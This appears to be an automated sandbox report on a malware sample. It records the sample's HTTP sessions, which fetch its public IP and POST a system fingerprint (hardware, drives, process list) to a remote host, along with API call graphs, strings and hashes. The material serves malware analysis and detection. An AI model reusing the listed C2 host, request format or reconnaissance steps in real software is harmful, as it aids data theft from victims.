                                      Dec 31, 2024 09:45:43.892755985 CET | 1.1.1.1 | 192.168.2.12 | 0xea20 | No error (0) | home.fortth14vs.top | | 91.149.241.220 | A (IP address) | IN (0x0001) | false
                                      Dec 31, 2024 09:45:44.942926884 CET | 1.1.1.1 | 192.168.2.12 | 0xf72e | No error (0) | home.fortth14vs.top | | 91.149.241.220 | A (IP address) | IN (0x0001) | false
                                      • httpbin.org
                                      • home.fortth14vs.top
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.12 | 49713 | 91.149.241.220 | 80 | 6812 | C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Dec 31, 2024 09:45:37.720835924 CET | 12360 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                      Host: home.fortth14vs.top
                                      Accept: */*
                                      Content-Type: application/json
                                      Content-Length: 502551
                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "8516589909668245295", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe" [TRUNCATED]
                                      Dec 31, 2024 09:45:43.047772884 CET | 157 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.22.1
                                      Date: Tue, 31 Dec 2024 08:45:42 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 1
                                      Connection: close
                                      Data Raw: 30
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.12 | 49715 | 91.149.241.220 | 80 | 6812 | C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Dec 31, 2024 09:45:44.061618090 CET | 99 | OUT | GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                      Host: home.fortth14vs.top
                                      Accept: */*
                                      Dec 31, 2024 09:45:44.784575939 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                      Server: nginx/1.22.1
                                      Date: Tue, 31 Dec 2024 08:45:44 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 207
                                      Connection: close
                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.12 | 49716 | 91.149.241.220 | 80 | 6812 | C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Dec 31, 2024 09:45:44.948961973 CET | 172 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                      Host: home.fortth14vs.top
                                      Accept: */*
                                      Content-Type: application/json
                                      Content-Length: 31
                                      Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                      Data Ascii: { "id1": "0", "data": "Done1" }
                                      Dec 31, 2024 09:45:45.815129995 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                      Server: nginx/1.22.1
                                      Date: Tue, 31 Dec 2024 08:45:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 207
                                      Connection: close
                                      Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.12 | 49711 | 34.197.122.172 | 443 | 6812 | C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-31 08:45:35 UTC | 52 | OUT | GET /ip HTTP/1.1
                                      Host: httpbin.org
                                      Accept: */*
                                      2024-12-31 08:45:35 UTC | 224 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 31 Dec 2024 08:45:35 GMT
                                      Content-Type: application/json
                                      Content-Length: 31
                                      Connection: close
                                      Server: gunicorn/19.9.0
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: true
                                      2024-12-31 08:45:35 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                      Data Ascii: { "origin": "8.46.123.189"}


                                      Target ID:0
                                      Start time:03:45:32
                                      Start date:31/12/2024
                                      Path:C:\Users\user\Desktop\yqUQPPp0LM.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\yqUQPPp0LM.exe"
                                      Imagebase:0x830000
                                      File size:4'472'832 bytes
                                      MD5 hash:00DACDC02143F49BA6542161592FEA9D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                        Execution Graph

                                        Execution Coverage:3.9%
                                        Dynamic/Decrypted Code Coverage:20.1%
                                        Signature Coverage:10.7%
                                        Total number of Nodes:747
                                        Total number of Limit Nodes:135
83212->83139 83213->83175 83214->83180 83215->83182 83216->83188 83217->83188 83218->83188 83219->83156 83220->83156 83221->83149 83222->83170 83613 866ab0 83614 866ad5 83613->83614 83615 866bb4 83614->83615 83616 846fa0 4 API calls 83614->83616 83617 8e5ed0 11 API calls 83615->83617 83619 866b54 83616->83619 83618 866ba9 83617->83618 83619->83615 83619->83618 83620 866b5d 83619->83620 83620->83618 83622 8e5ed0 83620->83622 83625 8e5a50 83622->83625 83624 8e5ee5 83624->83620 83626 8e5a58 83625->83626 83630 8e5ea0 83625->83630 83627 8e5b50 83626->83627 83639 8e5a99 83626->83639 83640 8e5b88 83626->83640 83631 8e5b7a 83627->83631 83632 8e5eb4 83627->83632 83627->83640 83628 8e5e96 83667 8f9480 6 API calls 83628->83667 83630->83624 83650 8e70a0 83631->83650 83633 8e6f10 7 API calls 83632->83633 83636 8e5ec2 83633->83636 83636->83636 83637 8e5be2 __WSAFDIsSet 83637->83639 83638 8e5da1 __WSAFDIsSet 83644 8e5cae 83638->83644 83639->83637 83639->83640 83642 8e70a0 7 API calls 83639->83642 83657 8e6f10 83639->83657 83640->83644 83665 8e5ef0 socket ioctlsocket setsockopt connect getsockname 83640->83665 83642->83639 83644->83628 83644->83638 83646 8fa920 83644->83646 83666 8f9320 6 API calls 83644->83666 83647 8fa944 83646->83647 83648 8fa977 send 83647->83648 83649 8fa94b 83647->83649 83648->83644 83649->83644 83654 8e70ae 83650->83654 83652 8e71a7 83652->83640 83653 8e717f 83653->83652 83681 8f9320 6 API calls 83653->83681 83654->83652 83654->83653 83668 8fa8c0 83654->83668 83672 8e71c0 83654->83672 83658 8e6f35 83657->83658 83664 8e7019 83658->83664 83709 8fa870 83658->83709 83661 8e6f4e 83662 8e701d 83661->83662 83663 8e71c0 5 API calls 83661->83663 83661->83664 83662->83639 83663->83661 83664->83662 83713 8f9320 6 API calls 83664->83713 83665->83640 83666->83644 83667->83630 83669 8fa8e6 83668->83669 83670 8fa903 recvfrom 83668->83670 83669->83670 83671 8fa8ed 83669->83671 83670->83671 83671->83654 83674 8e71e6 83672->83674 83673 8e71f2 83673->83654 83674->83673 83682 
8fbc80 83674->83682 83676 8e734e 83676->83673 83677 8e73c9 83676->83677 83679 8e73e3 83676->83679 83677->83673 83686 8e6050 83677->83686 83679->83673 83692 8e5ef0 socket ioctlsocket setsockopt connect getsockname 83679->83692 83681->83652 83683 8fbca1 83682->83683 83685 8fbcf1 83683->83685 83693 8e5ef0 socket ioctlsocket setsockopt connect getsockname 83683->83693 83685->83676 83687 8e60d9 83686->83687 83694 8faa30 83687->83694 83689 8e62fc 83690 8e6050 5 API calls 83689->83690 83691 8e6506 83689->83691 83690->83691 83691->83673 83692->83673 83693->83685 83695 8faa5f 83694->83695 83696 8fab96 socket 83695->83696 83697 8fab75 83695->83697 83699 8fab04 83695->83699 83696->83697 83696->83699 83698 8fabd0 ioctlsocket 83697->83698 83697->83699 83702 8fad2e 83697->83702 83703 8fabef 83698->83703 83699->83689 83700 8fad0a setsockopt 83700->83699 83700->83702 83701 8fada0 connect 83701->83702 83702->83699 83702->83701 83704 8fade1 83702->83704 83703->83699 83703->83700 83703->83702 83704->83699 83706 8faf70 83704->83706 83707 8faf93 getsockname 83706->83707 83708 8faf8d 83706->83708 83707->83708 83708->83699 83710 8fa88c 83709->83710 83711 8fa8aa recv 83709->83711 83710->83711 83712 8fa893 83710->83712 83711->83661 83712->83661 83713->83662 83714 8695b0 83715 8695c8 83714->83715 83717 8695fd 83714->83717 83716 86a150 2 API calls 83715->83716 83715->83717 83716->83717 83718 8329ff FindFirstFileA 83719 832a31 83718->83719 83720 832a5c RegOpenKeyExA 83719->83720 83721 832a93 83720->83721 83722 832ade CharUpperA 83721->83722 83723 832b0a 83722->83723 83724 832bf9 QueryFullProcessImageNameA 83723->83724 83725 832c3b CloseHandle 83724->83725 83727 832c64 83725->83727 83726 832df1 CloseHandle 83728 832e23 83726->83728 83727->83726 83223 833d5e 83224 833d30 83223->83224 83224->83223 83225 833d90 83224->83225 83229 840ab0 83224->83229 83232 83fcb0 12 API calls 83225->83232 83228 833dc1 83233 8405b0 83229->83233 83232->83228 83234 8407c7 83233->83234 83242 8405bd 83233->83242 
83234->83224 83235 84066a 83252 86dec0 83235->83252 83239 84067b 83245 8406f0 83239->83245 83248 8407ce 83239->83248 83259 8473b0 _open 83239->83259 83242->83234 83242->83235 83242->83248 83257 8403c0 _open 83242->83257 83258 847450 _open 83242->83258 83243 840707 WSAEventSelect 83243->83245 83243->83248 83244 8407ef 83244->83248 83250 840847 83244->83250 83261 846fa0 83244->83261 83245->83243 83245->83244 83247 8376a0 2 API calls 83245->83247 83247->83245 83260 847380 _open 83248->83260 83249 8409e8 WSAEnumNetworkEvents 83249->83250 83251 8409d0 WSAEventSelect 83249->83251 83250->83248 83250->83249 83250->83251 83251->83249 83251->83250 83253 86df1e 83252->83253 83254 86dece 83252->83254 83269 86df30 83254->83269 83256 86def9 83256->83239 83257->83242 83258->83242 83259->83239 83260->83234 83262 846feb 83261->83262 83263 846fd4 83261->83263 83262->83250 83263->83262 83264 847207 select 83263->83264 83264->83262 83268 847233 83264->83268 83265 84726b __WSAFDIsSet 83266 84729a __WSAFDIsSet 83265->83266 83265->83268 83267 8472ba __WSAFDIsSet 83266->83267 83266->83268 83267->83268 83268->83262 83268->83265 83268->83266 83268->83267 83272 86df44 83269->83272 83270 86dfb5 83270->83256 83272->83270 83273 86dfb9 83272->83273 83275 847450 _open 83272->83275 83276 847380 _open 83273->83276 83275->83272 83276->83270 83729 841139 83754 86baa0 83729->83754 83731 841148 83732 841512 83731->83732 83736 841161 83731->83736 83737 841527 83732->83737 83758 83fec0 12 API calls 83732->83758 83733 840f69 83735 841f58 83733->83735 83739 841fb0 83733->83739 83743 840f00 83733->83743 83738 840150 _open 83735->83738 83736->83733 83740 840150 _open 83736->83740 83737->83733 83759 8422d0 12 API calls 83737->83759 83749 841f61 83738->83749 83739->83743 83761 844940 _open 83739->83761 83740->83733 83744 840150 _open 83743->83744 83753 840f21 83743->83753 83744->83753 83745 841fa6 83745->83743 83746 84208a 83745->83746 83748 8375a0 _open 83745->83748 83745->83753 83762 843900 _open 
83746->83762 83750 842057 83748->83750 83749->83745 83760 86d4d0 7 API calls 83749->83760 83751 8375a0 _open 83750->83751 83751->83746 83755 86bb60 83754->83755 83757 86bac7 83754->83757 83755->83731 83757->83755 83763 8505b0 _open 83757->83763 83758->83737 83759->83733 83760->83745 83761->83745 83762->83743 83763->83755 83277 83255d 83320 bb9f70 83277->83320 83280 832589 83281 8325a0 GlobalMemoryStatusEx 83280->83281 83282 8325ec 83281->83282 83322 7400239 83282->83322 83326 74001bb 83282->83326 83330 7400138 83282->83330 83336 74000b8 83282->83336 83342 7400176 83282->83342 83348 7400036 83282->83348 83354 7400070 83282->83354 83360 74000f3 83282->83360 83366 740002e 83282->83366 83372 74001f0 83282->83372 83376 74001a6 83282->83376 83380 7400228 83282->83380 83384 7400325 83282->83384 83388 74002a5 83282->83388 83392 7400020 83282->83392 83398 74000a2 83282->83398 83404 740011b 83282->83404 83410 740019d 83282->83410 83414 74000d8 83282->83414 83420 7400059 83282->83420 83426 740000b 83282->83426 83432 74001d7 83282->83432 83438 7400309 83282->83438 83442 74000c9 83282->83442 83448 7400205 83282->83448 83452 74002c6 83282->83452 83456 7400000 83282->83456 83462 7400081 83282->83462 83321 83256c GetSystemInfo 83320->83321 83321->83280 83324 74002b9 83322->83324 83323 7400330 GetLogicalDrives 83323->83324 83324->83323 83325 740033f 83324->83325 83327 74001c1 83326->83327 83328 7400330 GetLogicalDrives 83327->83328 83329 740033f 83327->83329 83328->83327 83331 740016e 83330->83331 83332 740019d GetLogicalDrives 83331->83332 83334 7400190 83331->83334 83332->83334 83333 7400330 GetLogicalDrives 83333->83334 83334->83333 83335 740033f 83334->83335 83337 74000d0 83336->83337 83338 740019d GetLogicalDrives 83337->83338 83340 7400190 83337->83340 83338->83340 83339 7400330 GetLogicalDrives 83339->83340 83340->83339 83341 740033f 83340->83341 83343 740017f 83342->83343 83344 740019d GetLogicalDrives 83343->83344 83346 7400190 83344->83346 83345 7400330 GetLogicalDrives 
83345->83346 83346->83345 83347 740033f 83346->83347 83349 7400052 83348->83349 83350 740019d GetLogicalDrives 83349->83350 83352 7400190 83349->83352 83350->83352 83351 7400330 GetLogicalDrives 83351->83352 83352->83351 83353 740033f 83352->83353 83355 7400078 83354->83355 83356 740019d GetLogicalDrives 83355->83356 83358 7400190 83355->83358 83356->83358 83357 7400330 GetLogicalDrives 83357->83358 83358->83357 83359 740033f 83358->83359 83361 7400103 83360->83361 83362 740019d GetLogicalDrives 83361->83362 83364 7400190 83361->83364 83362->83364 83363 7400330 GetLogicalDrives 83363->83364 83364->83363 83365 740033f 83364->83365 83367 740003a 83366->83367 83368 740019d GetLogicalDrives 83367->83368 83370 7400190 83367->83370 83368->83370 83369 7400330 GetLogicalDrives 83369->83370 83370->83369 83371 740033f 83370->83371 83373 74001fb 83372->83373 83374 7400330 GetLogicalDrives 83373->83374 83375 740033f 83373->83375 83374->83373 83378 74001b0 83376->83378 83377 7400330 GetLogicalDrives 83377->83378 83378->83377 83379 740033f 83378->83379 83381 7400248 83380->83381 83382 7400330 GetLogicalDrives 83381->83382 83383 740033f 83381->83383 83382->83381 83385 7400330 GetLogicalDrives 83384->83385 83386 74002fd 83385->83386 83386->83385 83387 740033f 83386->83387 83390 74002af 83388->83390 83389 7400330 GetLogicalDrives 83389->83390 83390->83389 83391 740033f 83390->83391 83393 740003f 83392->83393 83394 740019d GetLogicalDrives 83393->83394 83396 7400190 83393->83396 83394->83396 83395 7400330 GetLogicalDrives 83395->83396 83396->83395 83397 740033f 83396->83397 83399 74000a8 83398->83399 83400 740019d GetLogicalDrives 83399->83400 83401 7400190 83399->83401 83400->83401 83402 7400330 GetLogicalDrives 83401->83402 83403 740033f 83401->83403 83402->83401 83405 740012e 83404->83405 83406 740019d GetLogicalDrives 83405->83406 83407 7400190 83405->83407 83406->83407 83408 7400330 GetLogicalDrives 83407->83408 83409 740033f 83407->83409 83408->83407 83411 74001b0 83410->83411 
83412 7400330 GetLogicalDrives 83411->83412 83413 740033f 83411->83413 83412->83411 83415 7400103 83414->83415 83416 740019d GetLogicalDrives 83415->83416 83418 7400190 83415->83418 83416->83418 83417 7400330 GetLogicalDrives 83417->83418 83418->83417 83419 740033f 83418->83419 83421 7400078 83420->83421 83422 740019d GetLogicalDrives 83421->83422 83424 7400190 83421->83424 83422->83424 83423 7400330 GetLogicalDrives 83423->83424 83424->83423 83425 740033f 83424->83425 83427 7400016 83426->83427 83428 740019d GetLogicalDrives 83427->83428 83430 7400190 83427->83430 83428->83430 83429 7400330 GetLogicalDrives 83429->83430 83430->83429 83431 740033f 83430->83431 83433 740017f 83432->83433 83434 740019d GetLogicalDrives 83433->83434 83435 7400190 83433->83435 83434->83435 83436 7400330 GetLogicalDrives 83435->83436 83437 740033f 83435->83437 83436->83435 83440 74002af 83438->83440 83439 7400330 GetLogicalDrives 83439->83440 83440->83439 83441 740033f 83440->83441 83443 74000d0 83442->83443 83444 740019d GetLogicalDrives 83443->83444 83445 7400190 83443->83445 83444->83445 83446 7400330 GetLogicalDrives 83445->83446 83447 740033f 83445->83447 83446->83445 83449 74001c6 83448->83449 83450 7400330 GetLogicalDrives 83449->83450 83451 740033f 83449->83451 83450->83449 83453 74002fd 83452->83453 83454 7400330 GetLogicalDrives 83453->83454 83455 740033f 83453->83455 83454->83453 83457 7400016 83456->83457 83458 740019d GetLogicalDrives 83457->83458 83460 7400190 83457->83460 83458->83460 83459 7400330 GetLogicalDrives 83459->83460 83460->83459 83461 740033f 83460->83461 83463 7400096 83462->83463 83464 740019d GetLogicalDrives 83463->83464 83466 7400190 83463->83466 83464->83466 83465 7400330 GetLogicalDrives 83465->83466 83466->83465 83467 740033f 83466->83467 83764 cffa30 83765 cffa5a 83764->83765 83766 cffa66 83765->83766 83767 bb8f70 _open 83765->83767 83768 cffa6f 83767->83768 83774 bc12c0 83768->83774 83771 cffaa6 83772 bb8f70 _open 83773 cffaaf 83772->83773 83775 
bc12cc 83774->83775 83778 bbe050 83775->83778 83777 bc12fa 83777->83771 83777->83772 83781 bbe09d 83778->83781 83802 bbe503 83778->83802 83779 bbe18e 83779->83777 83780 bbe388 83780->83779 83787 bbeb52 83780->83787 83793 bbe6b9 83780->83793 83780->83802 83807 bbdf60 fgetc 83780->83807 83781->83779 83781->83780 83782 bbdf60 fgetc 83781->83782 83783 bbe243 83781->83783 83781->83802 83782->83781 83783->83779 83803 bbdf60 fgetc 83783->83803 83784 bbfeb6 isxdigit 83784->83802 83786 bbdf60 fgetc 83786->83802 83788 bbe81a 83787->83788 83789 bbeb63 83787->83789 83796 bbe850 83788->83796 83797 bbeb7a 83788->83797 83790 bbf0d5 83789->83790 83789->83797 83808 bbdf60 fgetc 83790->83808 83793->83797 83801 bbe6e4 83793->83801 83793->83802 83796->83779 83805 bbdf60 fgetc 83796->83805 83797->83779 83797->83802 83806 bbdf60 fgetc 83797->83806 83799 bbf0e8 83799->83779 83799->83802 83809 bbdf60 fgetc 83799->83809 83801->83779 83804 bbdf60 fgetc 83801->83804 83802->83779 83802->83784 83802->83786 83803->83783 83804->83802 83805->83802 83806->83802 83807->83780 83808->83799 83809->83799
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                        • API String ID: 0-1590685507
                                        • Opcode ID: 50502995ce52952c93ae1e95713d320f14802a840babe02606bfbb8c1ee115fb
                                        • Instruction ID: f4fd895272225e06d770c1f1c453b3bef36b498bdc1b241269627aad63ea8d5d
                                        • Opcode Fuzzy Hash: 50502995ce52952c93ae1e95713d320f14802a840babe02606bfbb8c1ee115fb
                                        • Instruction Fuzzy Hash: B2C28B31A043449FD724CF28D585B6ABBE1FF84318F06866DED98DB262D771E984CB81

                                        Control-flow Graph

                                        [Control-flow graph of the function at 0083255D; legend: Executed / Not Executed]
                                        APIs
                                        • GetSystemInfo.KERNELBASE ref: 00832579
                                        • GlobalMemoryStatusEx.KERNELBASE ref: 008325CC
                                        • GetDriveTypeA.KERNELBASE ref: 00832647
                                        • GetDiskFreeSpaceExA.KERNELBASE ref: 0083267E
                                        • KiUserCallbackDispatcher.NTDLL ref: 008327E2
                                        • FindFirstFileW.KERNELBASE ref: 008328F8
                                        • FindNextFileW.KERNELBASE ref: 0083291F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                        • String ID: 7$@$}
                                        • API String ID: 3271271169-4020994123
                                        • Opcode ID: ef91a6fe1628aaf9d06121a8cc90fd14ab268423555cbad15c76cff2c2a204bb
                                        • Instruction ID: fedb5203a03c2c95a3636f50116f8e26a9028b0883e148dfbffda3f2ac998af6
                                        • Opcode Fuzzy Hash: ef91a6fe1628aaf9d06121a8cc90fd14ab268423555cbad15c76cff2c2a204bb
                                        • Instruction Fuzzy Hash: CED183B49057099FCB10EF68C58569EBBF1FF88344F008969E898D7351E7749A84CFA2

                                        Control-flow Graph

                                        [Control-flow graph of the function at 008329FF; legend: Executed / Not Executed]
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                        • String ID: 0$w
                                        • API String ID: 2406880114-1919229051
                                        • Opcode ID: 4285e98b7fd33f84650b85e205b5b5ca7a865bc35ff1c676714387d796e2ad7b
                                        • Instruction ID: f5275ee979402ff62c5e7d609f2c99088e3aecaef346268acf474b5629d6eee1
                                        • Opcode Fuzzy Hash: 4285e98b7fd33f84650b85e205b5b5ca7a865bc35ff1c676714387d796e2ad7b
                                        • Instruction Fuzzy Hash: 10E1B2B49043099FCB10EF68D98569EBBF5FB84344F508869E888E7350EB74D988CF52

                                        APIs
                                        • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00840712
                                        • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 008409DC
                                        • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008409FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: EventSelect$EnumEventsNetwork
                                        • String ID: multi.c
                                        • API String ID: 2170980988-214371023
                                        • Opcode ID: c527e202871f9f345ca1e6689f0d424fb1b0c18f09ef500a9baf238da41fd655
                                        • Instruction ID: 74814b3074dbeb7ee7fbcac9cf1c8aa162c8103350142ed4ef4781250984684a
                                        • Opcode Fuzzy Hash: c527e202871f9f345ca1e6689f0d424fb1b0c18f09ef500a9baf238da41fd655
                                        • Instruction Fuzzy Hash: 8BD18A716083099BE710CF64C881B6BBBE5FF94348F04482CFA85C6282E775E959DB93

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74523a78c16736b4d437c902c3165246407eada68d884b1b8936bafb534e141c
                                        • Instruction ID: b19c05f0a5036fa1b4683518fa5ca5e1d3d819935432a4bdddf23b1eb2d28695
                                        • Opcode Fuzzy Hash: 74523a78c16736b4d437c902c3165246407eada68d884b1b8936bafb534e141c
                                        • Instruction Fuzzy Hash: B091DE3060D75E8BD7358A6888947BBB2D9FBC4324F548B2CE8A9832D4EB759C40D681
                                        APIs
                                        • getsockname.WS2_32(-00000020,-00000020,?), ref: 008FB2B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: getsockname
                                        • String ID: ares__sortaddrinfo.c$cur != NULL
                                        • API String ID: 3358416759-2430778319
                                        • Opcode ID: e2e6fd0409735e388cf10cf42c4c7407fe4c148eb4d872450a54917a9d83a624
                                        • Instruction ID: 06a7991852179ce961189f40ad67227654751d8af5cbb06b4c2ba0e65d79a201
                                        • Opcode Fuzzy Hash: e2e6fd0409735e388cf10cf42c4c7407fe4c148eb4d872450a54917a9d83a624
                                        • Instruction Fuzzy Hash: AFC15C716043099FD718DF28C891A7A77E1FF88354F158868EA4ACB3A1EB34ED45CB81
                                        APIs
                                        • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,008E712E,?,?,?,00001001,00000000), ref: 008FA90D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: recvfrom
                                        • String ID:
                                        • API String ID: 846543921-0
                                        • Opcode ID: 04967b58af2b47719a5d59e29a4e1536b8be791c7ea7a5af61dd6f5e7b0145b8
                                        • Instruction ID: 6a8f90018a5f397217d49a4c16fedda49bd95b27f446318aaea3602074cbbb59
                                        • Opcode Fuzzy Hash: 04967b58af2b47719a5d59e29a4e1536b8be791c7ea7a5af61dd6f5e7b0145b8
                                        • Instruction Fuzzy Hash: 43F049B520830CAFD2109A11DC84D7BBBADFBC9768F05856DF95C132118270AE108AB2
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008EAA19
                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008EAA4C
                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 008EAA97
                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008EAAE9
                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008EAB30
                                        • RegCloseKey.KERNELBASE(?), ref: 008EAB6A
                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 008EAB82
                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 008EAC46
                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 008EAD0A
                                        • RegEnumKeyExA.KERNELBASE ref: 008EAD8D
                                        • RegCloseKey.KERNELBASE(?), ref: 008EADD9
                                        • RegEnumKeyExA.KERNELBASE ref: 008EAE08
                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 008EAE2A
                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008EAE54
                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008EAF63
                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008EAFB2
                                        • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 008EB072
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: QueryValue$Open$CloseEnum
                                        • String ID: ;m$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$ck
                                        • API String ID: 4217438148-345610589
                                        • Opcode ID: 4820e49823f4740f8dcd5916c7e3a23d34027effddfdda1743ecaa0cb06ba597
                                        • Instruction ID: c955a7f9d221f594adbb46ed26bfdb0d653c7828a8eace5f3e5ed9d2341c9d97
